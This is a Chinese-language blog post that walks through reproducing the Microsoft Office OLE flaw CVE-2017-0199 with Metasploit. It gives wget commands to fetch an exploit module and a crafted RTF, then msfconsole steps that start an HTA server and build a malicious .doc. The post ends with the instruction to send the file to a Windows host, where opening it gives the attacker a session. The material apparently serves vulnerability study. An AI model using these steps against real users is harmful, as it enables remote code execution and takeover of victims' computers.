msf复现CVE-2017-0199

0x01

预备知识

Microsoft Office的OLE处理机制的实现上存在一个逻辑漏洞(CVE-2017-0199),攻击者可能利用此漏洞通过诱使用户打开处理特殊构造的Office文件在用户系统上执行任意命令,从而控制用户系统。

在通常的攻击场景下,用户收到一个包含恶意代码的Office文件(不限于RTF格式的Word文件,可能为PPT类的其他Office文档),点击尝试打开文件时会从恶意网站下载特定的 HTA程序执行,从而使攻击者获取控制。
受影响的版本包括 word 07/10/13/16这几个版本。github上有该漏洞的利用脚本 传送门 今天就用msf复现一下这个洞吧。

0x02

1.首先要拉取利用脚本:
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rbmetasploit-framework/modules/exploits/windows/fileformat这个目录下。
然后重新加载模块,reload_all

2.下载rtf文件到/usr/share/metasploit-framework/data/exploits目录下
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf

3.开启hta服务

1
2
3
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
msf exploit(hta_server) > run

如果提示找不到模块的话,可以自己添加,然后重新加载模块,附上hta_server源码地址 传送门
4.生成exp

1
2
3
4
5
exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
msf exploit(office_word_hta) > set TARGETURI hta_server 生成的 Local IP
msf exploit(office_word_hta) > set FILENAME xxx.doc
msf exploit(office_word_hta) > run

5.把生成的doc文件发给win主机上,打开即可得到一个会话。

0x03

参考链接:

传送一
传送二

本文标题:msf复现CVE-2017-0199

文章作者:tkcharlotte

发布时间:2017年07月10日 - 21:07

最后更新:2018年02月07日 - 18:02

原始链接:boombao.net/2017/07/10/msf复现cve-2017-0199/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------本文结束感谢您的阅读-------------